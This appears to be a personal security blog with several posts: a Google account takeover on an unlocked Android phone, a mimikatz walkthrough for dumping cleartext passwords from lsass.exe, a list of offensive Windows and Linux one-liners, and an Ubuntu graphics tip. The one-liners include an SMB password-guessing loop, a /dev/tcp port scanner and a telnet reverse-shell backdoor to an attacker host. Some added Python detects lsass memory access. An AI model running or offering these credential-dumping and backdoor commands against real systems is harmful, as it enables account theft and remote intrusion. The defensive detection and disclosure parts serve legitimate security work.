Monday, August 29, 2016

Steal Google account on stolen or unattended unlocked phone.

With access to an unlocked phone (obtained through a weak PIN, a pattern attack or a smudge attack), an attacker can reset your Google account password if the account does not have 2-Step authentication enabled.

This is a security bug in the way Android devices allow a Google Account password to be reset.

I've reported this to the Google security team, but they say that this is not a security bug.

From my perspective this IS a vulnerability, so after talking several times with their triage team, I've decided to publish this.

I've made a video showing the vulnerability; it walks through the following steps to take over the account:

Setup (just for the PoC):
- clear the Chrome cache, to make sure the user is not logged in
- open the YouTube app, to show that the user is not logged in

Attacker steps:
- attacker opens the Play Store to check which user account is on the phone
- attacker opens the browser with the URL to log in with the Play Store account
- enter the email on the form "One account. All of Google" -> click "Next"
- on the password form -> click "Forgot password"
- on the form "Enter the last password..." -> click "Try a different question"
- on the next form -> click "Send prompt"
- on the prompt "Trying to sign in" -> click "Yes"
- after this the phone shows "Sign-in approved"
- it then allows the user's password to be changed without anything else
- create a new password
- click -> "Change password"
- Done.

After this it's possible to use every Google service with the new password.
At this point the attacker has access to all the user's information held in the Google account.

From my perspective a full Google account takeover is a big thing: these days people keep everything in Google.

Now, what can be done in this case? How can I protect myself?

One extra step in securing your Google account is having 2-Step authentication configured.
This is what I encourage everyone to do.

While talking to some of my colleagues, one reminded me of an option (thanks @clviper): if a user's phone is stolen, he can activate the "Erase" option in the Android Device Manager.
Link to the Android Device Manager:

This should be configured to "On":

Although this is not the solution to the problem, it can protect your data, because as soon as the attacker connects the phone to a network the phone should be erased.

Saturday, October 11, 2014

Get passwords from Lsass.exe dump

Benjamin Delpy found that the Windows process lsass.exe stores passwords in memory in a reversible form.
He then developed a great tool called "mimikatz"; the next lines are some steps to recover cleartext passwords.

Use "procdump", a Microsoft Sysinternals tool by Mark Russinovich, to dump the memory of the lsass.exe process:

> procdump -accepteula -ma lsass.exe lsass.dmp

Run mimikatz and enable debug mode:
> privilege::debug

Use minidump mode and load lsass.dmp:
> sekurlsa::minidump lsass.dmp

Another way is to run mimikatz directly on the live system, but it is not stealthy (some AV products flag it).
Run mimikatz in debug mode:
> privilege::debug

Get the passwords from memory:
> sekurlsa::logonPasswords

You can use mimikatz from Metasploit too, from a Meterpreter session:
execute -H -i -c -m -d calc.exe -f /root/mimi/Win32/mimikatz.exe -a  '"sekurlsa::logonPasswords full" exit'  

Thanks to the great Benjamin Delpy.
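On the defender side, the procdump and live mimikatz steps above both have to open lsass.exe with memory-read rights, which Sysmon records as Event ID 10 (ProcessAccess). The following Python check is an added example, not code from the original post; the allowlist and the sample events are constructed assumptions.

```python
import ntpath

# Windows process access rights (winnt.h) that matter for reading lsass memory.
PROCESS_VM_READ = 0x0010
PROCESS_ALL_ACCESS = 0x1FFFFF  # full access, as a complete memory dump requests

# Assumed allowlist of images that legitimately open lsass on this host.
ALLOWLIST = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe"}

# Constructed Sysmon Event ID 10 records (not real logs); only the fields used.
SAMPLE_EVENTS = [
    {"SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"SourceImage": r"C:\Tools\procdump.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"SourceImage": r"C:\Users\bob\AppData\Local\Temp\x.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400"},
    {"SourceImage": r"C:\Tools\procdump.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1FFFFF"},
]


def classify(event):
    """Return None, "memory-read" or "full-access" for one ProcessAccess event."""
    if ntpath.basename(event["TargetImage"]).lower() != "lsass.exe":
        return None
    if event["SourceImage"].lower() in ALLOWLIST:
        return None
    access = int(event["GrantedAccess"], 16)  # Sysmon logs the mask as a hex string
    if access == PROCESS_ALL_ACCESS:
        return "full-access"
    if access & PROCESS_VM_READ:  # can read process memory, enough to carve credentials
        return "memory-read"
    return None  # e.g. query-only handles such as Task Manager's


def suspicious_lsass_access(events):
    """List (SourceImage, verdict) for every event worth an alert."""
    hits = []
    for event in events:
        verdict = classify(event)
        if verdict:
            hits.append((event["SourceImage"], verdict))
    return hits


if __name__ == "__main__":
    for image, verdict in suspicious_lsass_access(SAMPLE_EVENTS):
        print(f"ALERT {verdict}: {image} opened lsass.exe")
```

Tune the allowlist per host: legitimate antivirus and backup agents also open lsass, and a query-only handle (no PROCESS_VM_READ) is not enough to read credentials.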

Another interesting vector is getting hashes from NTDS.DIT (the Active Directory database).

Wednesday, August 15, 2012

Pentesting ninjitsu - Ed Skoudis

Great article, very nice commands:

Ping Sweep
C:\> for /L %i in (1,1,255) do @ping -n 1 10.10.10.%i | find "Reply"

Reverse DNS Lookup
C:\> for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i

Dictionary Attack
C:\> for /f %i in (user.txt) do @(for /f %j in (pass.txt) do @echo %i:%j & @net use \\ %j /u:%i 2>nul && echo %i:%j >> success.txt && net use \\ /del)

Ninjitsu II

Linux Command-Line Port Scanner
$ port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port "is open" >> /tmp/ports.txt; port=`expr $port + 1`; done

Linux Command-Line Backdoor via “Reverse Telnet”
$ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]

The Windows Command Line Port Scanner Using FTP Client
C:\> for /L %i in (1,1,1024) do echo Checking Port %i: >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt

Windows Command-Line File Transfer
C:\> type [filename] > \\[machine]\[share]\[filename]

Backdoors: The File Shell
C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2

Ninjitsu III

Wireless Sniffing
C:\> for /L %i in (1,0,2) do @(netsh interface set interface "wireless network connection" disable & ping -n 3 >nul & netsh interface set interface "wireless network connection" enable & ping -n 4 >nul & netsh wlan show networks mode=bssid)

Install Telnet Client Vista
C:\> pkgmgr /iu:"TelnetClient"

Install Telnet Server Vista
C:\> pkgmgr /iu:"TelnetServer"

Install IIS 7.0
C:\> pkgmgr /iu:IIS-WebServerRole;WASWindowsActivationService;WAS-ProcessModel;WASNetFxEnvironment;WAS-ConfigurationAPI

List Domain Password Settings
C:\>net accounts /domain

Tuesday, June 5, 2012

Linux Ubuntu 12.04 - Ati / AMD discrete graphics

After searching a LOT on the web, forums, etc., I found a page with a tip that actually works for switching discrete graphics under the Linux X server.

I used this on my HP dv6 laptop.

Here are the steps:
1. Edit /etc/modprobe.d/blacklist.conf
2. Add these 2 lines to the end of the file:
   # radeon
   blacklist radeon
3. Edit /etc/rc.local and add:
   modprobe radeon
   chown -R $USER:$USER /sys/kernel/debug
   echo OFF > /sys/kernel/debug/vgaswitcheroo/switch
   (Note: rc.local already runs as root at boot, where $USER is normally unset, so the chown line does nothing there; handing /sys/kernel/debug to a regular user also exposes the kernel debug interfaces to that user, so drop it unless you need to write the switch file without root later.)
4. Reboot and it should be good.
5. You can check if it worked:
   cat /sys/kernel/debug/vgaswitcheroo/switch
No more fan noise, no more heat...
Very nice hack.
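To turn step 5 into an actual check, here is an added Python example (not from the original post) that parses the vgaswitcheroo switch file and reports whether the discrete GPU is really powered off; SAMPLE_SWITCH is constructed sample output, and the file path is the one from the steps above.

```python
import os

# Each line of the debugfs file is id:type:active:power:pci, for example
# "1:DIS: :Off:0000:01:00.0": type is IGD (integrated) or DIS (discrete),
# "+" marks the active client, power is Pwr or Off (newer kernels may
# prefix it with Dyn), and the PCI address keeps its own colons.
SWITCH_PATH = "/sys/kernel/debug/vgaswitcheroo/switch"

# Constructed sample output (not captured from a real machine): Intel active, Radeon off.
SAMPLE_SWITCH = """0:IGD:+:Pwr:0000:00:02.0
1:DIS: :Off:0000:01:00.0
"""


def parse_switch(text):
    """Turn the switch file contents into one dict per GPU client."""
    clients = []
    for line in text.splitlines():
        if not line.strip():
            continue
        cid, ctype, active, power, *pci = line.split(":")
        clients.append({
            "id": int(cid),
            "type": ctype,                 # IGD, DIS, or e.g. DIS-Audio
            "active": active == "+",       # the client currently driving X
            "powered": not power.endswith("Off"),
            "pci": ":".join(pci),          # re-join the split PCI address
        })
    return clients


def discrete_is_off(text):
    """True only when an integrated GPU is active and every discrete client is off."""
    clients = parse_switch(text)
    igd_active = any(c["type"] == "IGD" and c["active"] for c in clients)
    discrete = [c for c in clients if c["type"].startswith("DIS")]
    return igd_active and bool(discrete) and not any(c["powered"] for c in discrete)


def check_live(path=SWITCH_PATH):
    """Read the real debugfs file (needs read access to debugfs, normally root)."""
    if not os.path.exists(path):
        return None  # debugfs not mounted or no switcheroo-capable hardware
    with open(path) as f:
        return discrete_is_off(f.read())


if __name__ == "__main__":
    state = check_live()
    print("discrete GPU off" if state else "discrete GPU still powered or unknown")
```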